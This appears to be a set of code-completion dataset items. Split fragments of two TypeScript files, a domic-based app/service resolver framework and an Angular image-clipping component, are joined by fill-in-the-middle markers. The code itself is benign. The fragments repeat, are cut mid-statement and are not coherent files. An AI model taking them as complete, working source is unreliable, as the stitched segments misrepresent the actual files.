require<S extends Service>(type: Instantiator<S>): S {
return this.resolver.require(type)
}
}
/**
* A sample app, usable by default
*/
export const app = new App
export interface HasConfig<C> {
new (...a: any[]): InstanceHasConfig<C>
}
export interface InstanceHasConfig<C> extends Service {
init(c: C): any
}
/**
*
*/
export class Service {
app: App
ondestroy: (() => any)[] = []
_dependencies: Array<Service> = []
protected _initPromise: Promise<any>
constructor(app: App) {
this.app = app
}
// static with<Z, A, B, C, D, E, F>(this: new (app: App, a: A, b: B, c: C, d: D, e: E, f: F) => Z, a: A, b: B, c: C, d: D, e: E, f: F): ServiceConfig;
// static with<Z, A, B, C, D, E>(this: new (app: App, a: A, b: B, c: C, d: D, e: E) => Z, a: A, b: B, c: C, d: D, e: E): ServiceConfig;
// static with<Z, A, B, C, D>(this: new (app: App, a: A, b: B, c: C, d: D) => Z, a: A, b: B, c: C, d: D): ServiceConfig;
// static with<Z, A, B, C>(this: new (app: App, a: A, b: B, c: C) => Z, a: A, b: B, c: C): ServiceConfig;
// static with<Z, A, B>(this: new (app: App, a: A, b: B) => Z, a: A, b: B): ServiceConfig;
// static with<Z, A>(this: new (app: App, a: A) => Z, a: A): ServiceConfig;
// static with(...a: any[]) {
static conf<C>(this: HasConfig<C>, config: C) {
return new ServiceConfig(this as any, config)
}
/**
* Overload this method to perform your service initiation. You can
* return a Promise to indicate that the service may initialize itself
* asynchronously -- it may for instance perform network requests.
*
* If this service used require() for another service, then init() will
* only be called once the dependencies' init() have been resolved.
*/
public init(a: any = null): any {
return null
}
/**
*
*/
public getInitPromise(deps?: any[]): Promise<any> {
let conf = this.app.resolver.configs.get(this.constructor as typeof Service)
let params = conf ? conf.params : []
if (!this._initPromise)
this._initPromise = Promise.all(deps).then(() => this.init.apply(this, params))
return Promise.resolve(this._initPromise)
}
/**
* Require another service and put it into the list of dependencies.
*/
public require<S extends Service>(p: Instantiator<S>): S {
let serv = this.app.require(p)
this._dependencies.push(serv)
return serv as S
}
public observe<T>(a: MaybeObservable<T>, cbk: ObserverFunction<T, any>): this {
let obs = o(a).createObserver(cbk)
obs.startObserving()
this.ondestroy.push(() => obs.stopObserving())
return this
}
/**
* Override this method to tell when this partial needs to be re-inited.
*/
public needsReinit(): boolean {
for (let r of this._dependencies)
if (r.needsReinit()) return true
return false
}
destroy() {
for (let d of this.ondestroy) d()
this.onDestroy()
}
/**
* Called when destroying this Service.
* It is meant to be overridden.
*/
public onDestroy() {
}
}
/**
*
*/
export class Screen {
public blocks = new Map<Block, View>()
public deps = new Set<Instantiator<Service>>()
constructor(public app: App, public name: string) {
}
include(def: Screen): Screen {
def.blocks.forEach((view, block) => {
if (!this.blocks.has(block))
// include never overwrites blocks we would already have.
this.setBlock(block, view)
})
return this
}
extend(name: string, ...views: View[]): Screen {
let s = new Screen(this.app, name)
s.include(this)
s.define(...views)
return s
}
define(...views: View[]): Screen {
views.forEach(view => this.setBlock(view.block, view))
return this
}
protected setBlock(block: Block, view: View) {
this.blocks.set(block, view)
view.deps.forEach(dep => this.deps.add(dep))
return this
}
}
/**
* A view is a render function with Service dependencies that are resolved
* every time the application changes Screen.
*/
export class View {
public app: App
public deps: Instantiator<Service>[]
public fn: (...a: Service[]) => Node
public block: Block
constructor(app: App) {
this.app = app
}
}
/**
*
*/
export type Block = {
<A extends Service, B extends Service, C extends Service, D extends Service, E extends Service, F extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, e: Instantiator<E>, f: Instantiator<F>, fn: (a: A, b: B, c: C, d: D, e: E, f: F) => Node): View;
<A extends Service, B extends Service, C extends Service, D extends Service, E extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, e: Instantiator<E>, fn: (a: A, b: B, c: C, d: D, e: E) => Node): View;
<A extends Service, B extends Service, C extends Service, D extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, fn: (a: A, b: B, c: C, d: D) => Node): View;
<A extends Service, B extends Service, C extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, fn: (a: A, b: B, c: C) => Node): View;
<A extends Service, B extends Service>(a: Instantiator<A>, b: Instantiator<B>, fn: (a: A, b: B) => Node): View;
<A extends Service>(a: Instantiator<A>, fn: (c: A) => Node): View;
(fn: () => Node): View;
app: App
_name?: string
}
/**
*
*/
export class BlockDisplayer extends VirtualHolder {
// attrs: {
// block: Block
// }
current_view: View
current_deps: Set<Service>
name = `block ${this.block._name}`
constructor(public block: Block) {
super('block')
this.observe(this.block.app.o_services, services => {
if (!app.current_screen) return
this.update(app)
})
}
update(app: App): void {
// FIXME : check if the view has had changes in services or if
// the view object has changed.
let view = app.current_screen.blocks.get(this.block)
if (!view)
return this.updateChildren(null)
let deps = view.deps.map(type => app.services.get(type))
let newdeps = new Set<Service>(deps)
let dep_changed = !this.current_deps // compute if dependency changed.
if (this.current_deps) {
for (let d of deps) {
if (!this.current_deps.has(d)) {
dep_changed = true
break
}
}
}
if (view === this.current_view && !dep_changed)
return
this.current_view = view
this.current_deps = newdeps
// Compute the new view value.
this.updateChildren(view.fn(...deps))
}
}
/**
* Display a Block into the Tree
*/
export function | (block: Block): Node {
var comment = document.createComment(' DisplayBlock ')
var displayer = new BlockDisplayer(block)
displayer.addToNode(comment)
return comment
}
| DisplayBlock | identifier_name |
app.ts | import {
d,
o,
MaybeObservable,
Observable,
ObserverFunction,
VirtualHolder,
NodeCreatorFn
} from 'domic'
export type Instantiator<T> = new (...a: any[]) => T
/**
*
*/
export class ServiceConfig {
service: Instantiator<Service>
params: any[] = []
constructor(service: Instantiator<Service>, ...params: any[]) {
this.service = service
this.params = params
}
}
/**
*
*/
class Redirect extends Error {
screen: Screen
configs: ServiceConfig[]
constructor(screen: Screen, configs: ServiceConfig[]) {
super('redirecting')
this.screen = screen
this.configs = configs
}
}
export type ConfigMap = Map<Instantiator<Service>, ServiceConfig>
export type ServiceMap = Map<Instantiator<Service>, Service>
/**
* Resolver helps in service instanciation and destroy
*/
export class Resolver {
services: ServiceMap
configs: ConfigMap
old_resolver: Resolver | null
app: App
constructor(app: App) {
this.app = app
}
/**
* For a given service type, return an instance, creating it
* if it doesn't exist, using a matching ServiceConfig if provided.
*
* If this is not the first time the service is instanciated, try
* to reuse a previous instance as long as its config or any of its
* dependencies have not changed.
*
* @param type: A Service type
* @returns: The matching service instance
*/
require<S extends Service>(type: Instantiator<S>): S {
let service = this.services.get(type) as S
if (service) return service
let conf = this.configs.get(type)
if (conf) {
// we ignore previous service, since we are being given a new
// configuration for it.
service = new type(this.app, ...conf.params)
} else {
// try to get an older version of the service since possibly its
// configuration has not changed.
service = this.old_resolver ? this.old_resolver.services.get(type) as S : null
conf = this.old_resolver ? this.old_resolver.configs.get(type) : null
if (service) {
// browse the dependencies and check that they haven't changed themselves.
// if require() sends a different instance of the dependency, this service
// is not reused.
for (let d of service._dependencies) {
let nd = this.require((d as any).constructor)
if (d !== nd)
service = null
}
}
if (!service) {
// no config, no previously instanciated service, so
// we just create one without arguments, reusing its config if it had one previously.
let params = conf ? conf.params : []
service = new type(this.app, ...params)
}
// pull the old configuration into the new map to keep track of it.
if (conf) this.configs.set(type, conf)
}
this.services.set(type, service)
return service
}
/**
* Destroy services that won't be used anymore by calling their destroy()
* method.
*/
commit(): void {
// Destroy old service versions.
if (this.old_resolver) {
this.old_resolver.services.forEach((serv, type) => {
if (this.services.get(type) !== serv) {
serv.destroy()
}
})
}
// free the old resolver so it can be garbage collected.
this.old_resolver = null
}
/**
* Call all the init() of the services.
*
* @returns: A promise of when the initiation will be done.
*/
init(): Promise<any> {
let promises: Promise<any>[] = []
this.services.forEach(serv => {
// Setup the promise chain ; basically, getInitPromise gets all the dependencies promises
// and will make their init() method wait on them.
promises.push(serv.getInitPromise(serv._dependencies.map(d => d.getInitPromise())))
})
return Promise.all(promises)
}
/**
* Prepare the resolver for a new transition.
*/
prepare(
screen: Screen,
old_resolver: Resolver,
configs: ServiceConfig[]
): void {
// Setup the config map
this.configs = new Map() as ConfigMap
this.services = new Map() as ServiceMap
this.old_resolver = old_resolver
configs.forEach(conf => this.configs.set(conf.service, conf))
screen.deps.forEach(dep => this.require(dep))
}
}
export type State = {screen: Screen, config: Map<Instantiator<Service>, ServiceConfig>}
/**
* Application
*/
export class App {
// True while a go() transition is in flight; concurrent go() calls are rejected.
public activating = false
public current_screen: Screen = null
public resolver: Resolver = null
// Maps committed by the last successful go() transition.
public services: Map<Instantiator<Service>, Service>
public config: Map<Instantiator<Service>, ServiceConfig>
// Navigation history mirrored into window.history via state_index.
public state_stack: State[] = []
public current_state_index: number = -1
public o_services: Observable<ServiceMap> = o(null)
constructor() {
window.addEventListener('popstate', ev => {
// NOTE(review): ev.state can be null (e.g. initial popstate in some
// browsers, or entries not pushed by this app) — this would throw here;
// confirm whether a null guard is needed.
this.popstate(ev.state.state_index)
})
}
// Create a Block: a factory that binds service dependencies and a render
// function into a View attached to this app.
block(name: string): Block {
var block: Block = function _block(...a: any[]): View {
// Last argument is the render function, everything before it is a
// service dependency class.
let v = new View(this)
let fn = a[a.length - 1]
let services = a.slice(0, a.length - 1)
v.fn = fn
v.deps = services
v.block = block
v.app = block.app
return v
} as Block
block.app = this
block._name = name
return block
// return new Block(this)
}
// Create and define a named Screen from a set of views.
screen(name: string, ...views: View[]): Screen {
let screen = new Screen(this, name)
screen.define(...views)
return screen
}
/**
* Transition the application to the given screen. Builds a new Resolver,
* initializes all required services, then commits the switch and pushes a
* history entry. On failure the previous resolver is restored; a thrown
* Redirect ('redirecting') triggers a nested go() to the new target.
*/
go(screen: Screen, ...configs: ServiceConfig[]): Promise<any> {
if (this.activating)
// Should do some kind of redirect here ?
return Promise.reject(new Redirect(screen, configs))
try {
this.activating = true
let prev_resolver = this.resolver
this.resolver = new Resolver(this)
this.resolver.prepare(screen, prev_resolver, configs)
// wait on all the promises before transitionning to a new state.
return this.resolver.init().then(res => {
this.resolver.commit()
this.config = this.resolver.configs
this.services = this.resolver.services
this.current_screen = screen as Screen
this.activating = false
// Notify observers (e.g. BlockDisplayer) that services changed.
this.o_services.set(this.services)
// Replace state stack to remove all possible forward occurences...
// XXX : forward is bugged ?
this.state_stack = this.state_stack.slice(0, this.current_state_index + 1)
// Push
this.state_stack.push({
screen: this.current_screen,
config: this.config
})
this.current_state_index = this.state_stack.length - 1
window.history.pushState({state_index: this.state_stack.length - 1}, null)
}).catch(err => {
// cancel activation.
this.resolver = prev_resolver
this.activating = false
if (err.message === 'redirecting' && err.screen)
return this.go(err.screen, ...err.configs)
return Promise.reject(err)
})
} catch (err) {
this.activating = false
return Promise.reject(err)
}
}
// Re-run go() for a history entry selected via the browser back/forward
// buttons. NOTE(review): rejects with a bare string rather than an Error,
// and the current_state_index is not updated to idx before go() pushes a
// new entry — verify back/forward behaves as intended.
async popstate(idx: number) {
if (this.state_stack.length === 0) return Promise.reject('no previous screen')
let state = this.state_stack[idx]
let configs: ServiceConfig[] = []
state.config.forEach(value => configs.push(value))
try {
await this.go(state.screen, ...configs)
} catch (e) {
console.error(e)
}
}
/**
* Require a service instance from the current resolver.
*/
require<S extends Service>(type: Instantiator<S>): S {
return this.resolver.require(type)
}
}
/**
* A sample app, usable by default
*/
export const app = new App
// Constructor type for services whose init() accepts a typed config object.
export interface HasConfig<C> {
new (...a: any[]): InstanceHasConfig<C>
}
// A Service instance whose init() takes a configuration of type C.
export interface InstanceHasConfig<C> extends Service {
init(c: C): any
}
/**
* | ondestroy: (() => any)[] = []
_dependencies: Array<Service> = []
protected _initPromise: Promise<any>
constructor(app: App) {
this.app = app
}
// static with<Z, A, B, C, D, E, F>(this: new (app: App, a: A, b: B, c: C, d: D, e: E, f: F) => Z, a: A, b: B, c: C, d: D, e: E, f: F): ServiceConfig;
// static with<Z, A, B, C, D, E>(this: new (app: App, a: A, b: B, c: C, d: D, e: E) => Z, a: A, b: B, c: C, d: D, e: E): ServiceConfig;
// static with<Z, A, B, C, D>(this: new (app: App, a: A, b: B, c: C, d: D) => Z, a: A, b: B, c: C, d: D): ServiceConfig;
// static with<Z, A, B, C>(this: new (app: App, a: A, b: B, c: C) => Z, a: A, b: B, c: C): ServiceConfig;
// static with<Z, A, B>(this: new (app: App, a: A, b: B) => Z, a: A, b: B): ServiceConfig;
// static with<Z, A>(this: new (app: App, a: A) => Z, a: A): ServiceConfig;
// static with(...a: any[]) {
// Bind this service class to an init() configuration, producing the
// ServiceConfig objects consumed by App.go() / Resolver.prepare().
static conf<C>(this: HasConfig<C>, config: C) {
return new ServiceConfig(this as any, config)
}
/**
* Overload this method to perform your service initiation. You can
* return a Promise to indicate that the service may initialize itself
* asynchronously -- it may for instance perform network requests.
*
* If this service used require() for another service, then init() will
* only be called once the dependencies' init() have been resolved.
*/
public init(a: any = null): any {
// Default implementation is a no-op; subclasses override (see doc above).
return null
}
/**
 * Return the (memoized) promise that resolves once this service's init()
 * has run. The first call chains init() behind the provided dependency
 * promises, with params taken from this service's ServiceConfig (if any);
 * subsequent calls reuse the same underlying promise.
 */
public getInitPromise(deps?: any[]): Promise<any> {
let conf = this.app.resolver.configs.get(this.constructor as typeof Service)
let params = conf ? conf.params : []
if (!this._initPromise)
// Dependencies settle first, then this service's own init() runs.
this._initPromise = Promise.all(deps).then(() => this.init.apply(this, params))
return Promise.resolve(this._initPromise)
}
/**
 * Require another service and record it as a dependency of this one, so
 * its init() completes before ours and needsReinit() can consult it.
 */
public require<S extends Service>(p: Instantiator<S>): S {
  const service = this.app.require(p) as S
  this._dependencies.push(service)
  return service
}
// Observe a (maybe-)observable value for the lifetime of this service;
// the observer is stopped automatically when destroy() runs.
public observe<T>(a: MaybeObservable<T>, cbk: ObserverFunction<T, any>): this {
let obs = o(a).createObserver(cbk)
obs.startObserving()
this.ondestroy.push(() => obs.stopObserving())
return this
}
/**
 * Override this method to tell when this partial needs to be re-inited.
 * Default: re-init whenever any dependency needs it.
 */
public needsReinit(): boolean {
  return this._dependencies.some(dep => dep.needsReinit())
}
destroy() {
  // Run every registered teardown callback, then the overridable hook.
  this.ondestroy.forEach(teardown => teardown())
  this.onDestroy()
}
/**
 * Hook invoked by destroy() after the registered teardown callbacks.
 * It is meant to be overridden; the default is a no-op.
 */
public onDestroy() {
}
}
/**
*
*/
/**
 * A named mapping of Block -> View, plus the union of all Service
 * dependencies those views require.
 */
export class Screen {
  public blocks = new Map<Block, View>()
  public deps = new Set<Instantiator<Service>>()
  constructor(public app: App, public name: string) {
  }
  /** Merge another screen's views in, without overwriting existing blocks. */
  include(def: Screen): Screen {
    def.blocks.forEach((view, block) => {
      const alreadyDefined = this.blocks.has(block)
      // include never overwrites blocks we would already have.
      if (!alreadyDefined)
        this.setBlock(block, view)
    })
    return this
  }
  /** Derive a new screen from this one, adding or overriding views. */
  extend(name: string, ...views: View[]): Screen {
    const extended = new Screen(this.app, name)
    extended.include(this)
    extended.define(...views)
    return extended
  }
  /** Register each view on the block it was created for. */
  define(...views: View[]): Screen {
    for (const view of views) this.setBlock(view.block, view)
    return this
  }
  /** Store the mapping and fold the view's dependencies into this.deps. */
  protected setBlock(block: Block, view: View) {
    this.blocks.set(block, view)
    for (const dep of view.deps) this.deps.add(dep)
    return this
  }
}
/**
* A view is a render function with Service dependencies that are resolved
* every time the application changes Screen.
*/
export class View {
public app: App
// Service classes resolved and passed to fn on each screen change.
public deps: Instantiator<Service>[]
// Render function producing the DOM node for this view.
public fn: (...a: Service[]) => Node
// The block this view was created for.
public block: Block
constructor(app: App) {
this.app = app
}
}
/**
 * Call signature set for a block factory: up to six Service dependency
 * classes followed by a render function that receives their instances.
 */
export type Block = {
<A extends Service, B extends Service, C extends Service, D extends Service, E extends Service, F extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, e: Instantiator<E>, f: Instantiator<F>, fn: (a: A, b: B, c: C, d: D, e: E, f: F) => Node): View;
<A extends Service, B extends Service, C extends Service, D extends Service, E extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, e: Instantiator<E>, fn: (a: A, b: B, c: C, d: D, e: E) => Node): View;
<A extends Service, B extends Service, C extends Service, D extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, d: Instantiator<D>, fn: (a: A, b: B, c: C, d: D) => Node): View;
<A extends Service, B extends Service, C extends Service>(a: Instantiator<A>, b: Instantiator<B>, c: Instantiator<C>, fn: (a: A, b: B, c: C) => Node): View;
<A extends Service, B extends Service>(a: Instantiator<A>, b: Instantiator<B>, fn: (a: A, b: B) => Node): View;
<A extends Service>(a: Instantiator<A>, fn: (c: A) => Node): View;
(fn: () => Node): View;
app: App
_name?: string
}
/**
*
*/
export class BlockDisplayer extends VirtualHolder {
// attrs: {
// block: Block
// }
current_view: View
current_deps: Set<Service>
// NOTE(review): this field initializer reads this.block (a constructor
// parameter property); whether it is assigned before field initializers
// run depends on the TS target / useDefineForClassFields — confirm.
name = `block ${this.block._name}`
constructor(public block: Block) {
super('block')
// Re-render whenever the app commits a new service map.
this.observe(this.block.app.o_services, services => {
if (!app.current_screen) return
this.update(app)
})
}
// Recompute the displayed view for the current screen, re-rendering only
// if the view object or any resolved service instance changed.
update(app: App): void {
// FIXME : check if the view has had changes in services or if
// the view object has changed.
let view = app.current_screen.blocks.get(this.block)
if (!view)
return this.updateChildren(null)
let deps = view.deps.map(type => app.services.get(type))
let newdeps = new Set<Service>(deps)
let dep_changed = !this.current_deps // compute if dependency changed.
if (this.current_deps) {
// NOTE(review): only detects new/replaced deps; a dependency removed
// from the view would not flip this flag — confirm that is acceptable.
for (let d of deps) {
if (!this.current_deps.has(d)) {
dep_changed = true
break
}
}
}
if (view === this.current_view && !dep_changed)
return
this.current_view = view
this.current_deps = newdeps
// Compute the new view value.
this.updateChildren(view.fn(...deps))
}
}
/**
* Display a Block into the Tree
*/
export function DisplayBlock(block: Block): Node {
var comment = document.createComment(' DisplayBlock ')
var displayer = new BlockDisplayer(block)
displayer.addToNode(comment)
return comment
} | */
export class Service {
app: App | random_line_split |
image-clip.component.ts | import { ViewChild, Component, ElementRef, ChangeDetectorRef, SimpleChanges, AfterViewInit,
OnInit, OnChanges, OnDestroy, Input, Output, EventEmitter
} from '@angular/core';
import { HttpEventType } from '@angular/common/http';
import { DomSanitizer, SafeStyle } from '@angular/platform-browser';
import * as Rx from 'rxjs/Rx';
import * as lodash from 'lodash';
import * as domtoimage from 'dom-to-image';
import * as html2canvas from "html2canvas";
import { LoadingComponent } from '@app-ui/loading/loading.component';
import { ImagePath, ClipPath } from '@app/models';
import { AppService } from '@app/app.service';
import { UUID } from '@app-lib/uuid/uuid.service';
import * as imageUrl from '@app-lib/functions/image-url';
// ----------------------------------------------------------------
// Component
// ----------------------------------------------------------------
@Component({
moduleId : module.id,
selector : 'image-clip',
templateUrl: './image-clip.component.html',
styleUrls: [
'./image-clip.component.css',
]
})
export class ImageClipComponent implements OnInit, OnChanges, OnDestroy {
@Input() image: ImagePath = null;
@Output() placeOnPage = new EventEmitter<ImagePath>();
@Output() close = new EventEmitter<void>();
@ViewChild('clipbox') public _clipbox: ElementRef;
get clipboxElem(): HTMLElement { return (this._clipbox.nativeElement as HTMLElement); }
@ViewChild(LoadingComponent) loadingComponent: LoadingComponent;
@ViewChild('shadowboard') public _shadowboard: ElementRef;
@ViewChild('clipboard') public _clipboard: ElementRef;
@ViewChild('clipboardPath') public _clipboardPath: ElementRef;
@ViewChild('handles') public _handles: ElementRef;
public clipPath: ClipPath = null;
public _currentHandler: number = -1;
public _totalHandlers: number = 0;
public _loading: boolean = false;
private pWidth: number = 2.8; // (300 - 20) / 100
private pHeight: number = 2.8;
private extra: number = 1;
private subs: Rx.Subscription[] = [];
constructor(
private changeDetector: ChangeDetectorRef,
public elementRef: ElementRef,
private sanitizer: DomSanitizer,
private appService: AppService
) { }
ngOnInit() {
// Compute the clip-board scale as soon as an image input is available.
if (this.image)
this.setClipboxSize();
}
ngOnChanges(changes: SimpleChanges) {
// Recompute the scale whenever a new (non-null) image input arrives.
if (changes['image'] && changes['image'].currentValue)
this.setClipboxSize();
}
// Compute pWidth/pHeight, the pixels-per-percent scale of the clip board.
setClipboxSize() {
if (!this.image) return;
// Circle/ellipse clips use a fixed square board (2.8 px per percent).
if (this.clipPath && (this.clipPath.type == 'circle' || this.clipPath.type == 'ellipse')) {
this.pHeight = 2.8;
this.pWidth = 2.8;
}
else {
// Fit the image into an 880x480 box, preserving aspect ratio.
let width = 880;
let height = 480;
let img = new Image;
img.src = this.image.location + '/' + this.image.name;
// NOTE(review): img.width/height are read synchronously right after
// setting src; unless the image is already cached they will be 0 here.
// Confirm whether an onload handler (or naturalWidth/Height) is needed.
let imgHeight = img.height;
let imgWidth = img.width;
if ( imgWidth > width) {
imgHeight = imgHeight * (width / imgWidth);
imgWidth = width;
}
if (imgHeight > height) {
imgWidth = imgWidth * (height / imgHeight);
imgHeight = height;
}
// 1% of the fitted image, in pixels.
this.pHeight = imgHeight / 100;
this.pWidth = imgWidth / 100;
}
}
// Handle a toolbar command. Change detection is detached here and driven
// manually afterwards via refreshView()/detectChanges().
onSetCommand(event: string) {
  this.changeDetector.detach();
  if (event === 'PlaceOnPage') {
    this.onSaveImage();
  } else if (event === 'Back') {
    this.close.emit();
  }
}
// Export the clipped image as a PNG (via dom-to-image), upload it, and emit
// the uploaded ImagePath through placeOnPage. The surrounding dialog is
// disabled (CSS class) for the duration of the upload.
onSaveImage() {
if (!this.image) return;
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).addClass('disable');
// Scale factor applied in getSVGPath() while exporting (≈ 300/280),
// compensating for the 10px inset removed by cleanBox().
this.extra = 1.07142857142;
this.refreshView(true);
// Hide handles/decoration so only the clipped image is captured.
this.cleanBox();
setTimeout(() => {
// html2canvas(this.clipboxElem, {
// allowTaint: false,
// useCORS: true,
// logging: false,
// imageTimeout: 0,
// backgroundColor: "#FFFFFF",
// // scale: scale
// })
// .then(canvas => {
// let dataImage = canvas.toDataURL("image/jpeg", 0.92); //image/png
// // let dataImage = canvas.toDataURL('image/png'); //image/png
// let imageFile = this.appService.dataURLtoFile(
// dataImage,
// this.image.name + '_clip_' + UUID.UUID() + '.png'
// );
domtoimage.toPng(this.clipboxElem)
.then((dataURL: any) => {
const imageFile = this.appService.dataURLtoFile(dataURL, decodeURIComponent(this.image.name) + '-clip' + UUID.UUID() + '.png');
this.appService.uploadImages([imageFile]).subscribe(
event => {
switch (event.type) {
case HttpEventType.Sent:
// console.log(`Uploading file "${index}" of size ${f.size}.`);
break;
case HttpEventType.UploadProgress:
// Cap at 98% so the bar completes only on the final response.
if (this.loadingComponent)
this.loadingComponent.set(Math.min(event.loaded / event.total * 100, 98));
break;
case HttpEventType.Response:
if (this.loadingComponent)
this.loadingComponent.complete();
const tuid = lodash.get(event, 'body.tuid');
const img = lodash.get(event, ['body', 'urls', 0]);
if (tuid) {
localStorage.setItem('tuid', lodash.get(event, 'body.tuid'));
}
if (img) {
this.placeOnPage.emit(img as ImagePath);
}
break;
// default:
// console.log(`File "${index}" surprising upload event: ${event.type}.`);
}
},
error => {
console.log(error);
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
// this.alertService.playToast('Failed', `There is an error while uploading ${f.name}. Try again`, 1);
},
() => {
// Complete: re-enable the dialog. NOTE(review): restoreBox() is only
// called on the dom-to-image failure path, not after a successful
// upload — confirm the component is closed in that case.
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
}
);
})
.catch((error: any) => {
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
this.restoreBox();
console.error('oops, something went wrong!', error);
});
});
}
// Strip handles and decoration classes so the exported PNG shows only
// the clipped image.
cleanBox() {
  const handles = this._handles.nativeElement as HTMLElement;
  const clipbox = this._clipbox.nativeElement as HTMLElement;
  const clipboard = this._clipboard.nativeElement as HTMLElement;
  const shadowboard = this._shadowboard.nativeElement as HTMLElement;
  handles.setAttribute('hidden', 'true');
  $(clipbox).removeClass('box-shadow');
  $(clipboard).removeClass('inside-10');
  $(shadowboard).removeClass('inside-10');
}
// Undo cleanBox(): restore handles, decoration classes and the normal
// (non-export) coordinate scale.
restoreBox() {
  this.extra = 1;
  const handles = this._handles.nativeElement as HTMLElement;
  const clipbox = this._clipbox.nativeElement as HTMLElement;
  const clipboard = this._clipboard.nativeElement as HTMLElement;
  const shadowboard = this._shadowboard.nativeElement as HTMLElement;
  handles.removeAttribute('hidden');
  $(clipbox).addClass('box-shadow');
  $(clipboard).addClass('inside-10');
  $(shadowboard).addClass('inside-10');
}
// Apply a newly selected clip path and adjust the board scale for it.
onSetClipPath(event: ClipPath) {
  this.clipPath = event;
  const fixedScale =
    event.type === 'circle' || event.type === 'ellipse' || event.type === 'svg';
  if (fixedScale) {
    // These clip types work on a fixed square board.
    this.pHeight = 2.8;
    this.pWidth = 2.8;
  } else {
    this.setClipboxSize();
  }
  this.refreshView();
}
// Update the opacity applied outside the clip region (see getOpacity()).
onSetOutsideClip(event: number) {
if (!this.clipPath) return;
this.clipPath.outside = event;
this.refreshView();
}
// Build the CSS polygon() expression from the handle positions, or ''
// when there are no handles.
getPolygon(): string {
  const points = this.clipPath.value
    .map(v => `${v.x}% ${v.y}%`)
    .join(',');
  return points === '' ? '' : `polygon(${points})`;
}
// Build the CSS circle() expression: handle 0 sets the radius (distance
// of its y from 50%), handle 1 is the center.
getCircle(): string {
  const [radiusHandle, center] = this.clipPath.value;
  const radius = Math.abs(50 - radiusHandle.y);
  return `circle(${radius}% at ${center.x}% ${center.y}%)`;
}
getEllipse(): string |
// Build the CSS inset() expression from the four edge handles
// (top, right, bottom, left).
getInset(): string {
  const v = this.clipPath.value;
  const top = v[0].y;
  const right = 100 - v[1].x;
  const bottom = 100 - v[2].y;
  const left = v[3].x;
  return `inset(${top}% ${right}% ${bottom}% ${left}%)`;
}
// Sanitized clip-path value for binding into a style. Delegates the raw
// string construction to getClipPath1() so both entry points share one
// source of truth; the SVG case references the template's #svgPath.
getClipPath() {
  if (!this.clipPath) return '';
  switch (this.clipPath.type) {
    case 'polygon':
    case 'ellipse':
    case 'circle':
    case 'inset':
      return this.sanitizer.bypassSecurityTrustStyle(this.getClipPath1());
    case 'svg':
      return 'url(#svgPath)';
  }
  // Unknown clip type: no clipping.
  return '';
}
// Raw (unsanitized) clip-path string for the current clip type, or ''
// for no/unknown clip. 'svg' is intentionally not handled here.
getClipPath1() {
  if (!this.clipPath) return '';
  const builders: { [type: string]: () => string } = {
    polygon: () => this.getPolygon(),
    ellipse: () => this.getEllipse(),
    circle: () => this.getCircle(),
    inset: () => this.getInset(),
  };
  const build = builders[this.clipPath.type];
  return build ? build() : '';
}
// Build an SVG path ("M ... C ... C ... C ... Z") from 8 handle points:
// point 0 is the start anchor, then the index map p walks three cubic
// Bézier segments (1-2-3, 4-5-6, 7-1-0) back to the start. `extra`
// scales coordinates up during PNG export (see onSaveImage()).
getSVGPath() {
let p =[1,2,3,4,5,6,7,1,0];
let result = 'M ' + (this.extra * this.clipPath.value[0].x) + ' ' + (this.extra * this.clipPath.value[0].y) + ' ';
for(let i = 0; i < 3; i++) {
result += 'C ';
for(let j = 0; j < 3; j++) {
result += (this.extra * this.clipPath.value[p[i*3 + j]].x) + ' ' + (this.extra * this.clipPath.value[p[i*3 + j]].y) + ' ';
}
}
result +='Z ';
return result;
}
// Opacity applied outside the clip region; fully opaque when no clip is set.
getOpacity() {
  if (!this.clipPath) return 1;
  return this.clipPath.outside;
}
// Horizontal handle position: SVG clips use raw coordinates, the other
// clip types store percentages that must be scaled to pixels.
getXPosition(p: number) {
  if (this.clipPath.type === 'svg') return p;
  return p * this.pWidth;
}
// Vertical handle position: SVG clips use raw coordinates, the other
// clip types store percentages that must be scaled to pixels.
getYPosition(p: number) {
  if (this.clipPath.type === 'svg') return p;
  return p * this.pHeight;
}
// Whether the removal affordance should show for handle `i`: never for
// SVG clips, never when removal would drop below 3 handles, and only for
// the handle currently being interacted with. (Fixes the loose `==`
// comparison and the redundant `? true : false`.)
removalHandler(i: number) {
  if (this.clipPath.type === 'svg') return false;
  if (this._totalHandlers < 4) return false;
  return this._currentHandler === i;
}
// Sanitized CSS background-image value for the source image, built by the
// shared image-url helper.
backgroundImage(): SafeStyle {
// this.resultImage.nativeElement.style.setProperty('background-image', imageUrl.imageUrl(this.itemContent.image));
// return this.image ? this.sanitizer.bypassSecurityTrustStyle(`url('${this.image.location + "/" + this.image.name}')`) : '';
return this.sanitizer.bypassSecurityTrustStyle(imageUrl.imageUrl(this.image));
}
// Delete the clip handle at index i and redraw the clip path.
onRemoveHandler(i: number) {
this.clipPath.value.splice(i,1);
this.refreshView();
}
// Mark handle n as active; the removal affordance (removalHandler()) is
// shown for it, then auto-hidden after 2 seconds.
// NOTE(review): the timeout is not cancelled if another drag starts
// within 2s, so it will clear the newer handle's active state — confirm
// whether that is intended.
onDragStart(n: number, event: any) {
this._currentHandler = n;
setTimeout(() => {
this._currentHandler = -1;
this.refreshView();
}, 2000);
}
// Move handle n: SVG clips work in raw pixel space, others convert the
// pixel offset back to a percentage via the px-per-percent scale.
// NOTE(review): assumes event.left/event.top are pixel offsets supplied
// by the drag directive — confirm against the template's bindings.
onDrag(n: number, event: any) {
this.clipPath.value[n].x = this.clipPath.type=='svg' ? event.left : event.left / this.pWidth;
this.clipPath.value[n].y = this.clipPath.type=='svg' ? event.top : event.top / this.pHeight;
this.refreshView();
}
// Final redraw once the drag gesture completes.
onDragEnd(n: number, event: any) {
this.refreshView();
}
// Re-render manually: the change detector may have been detached in
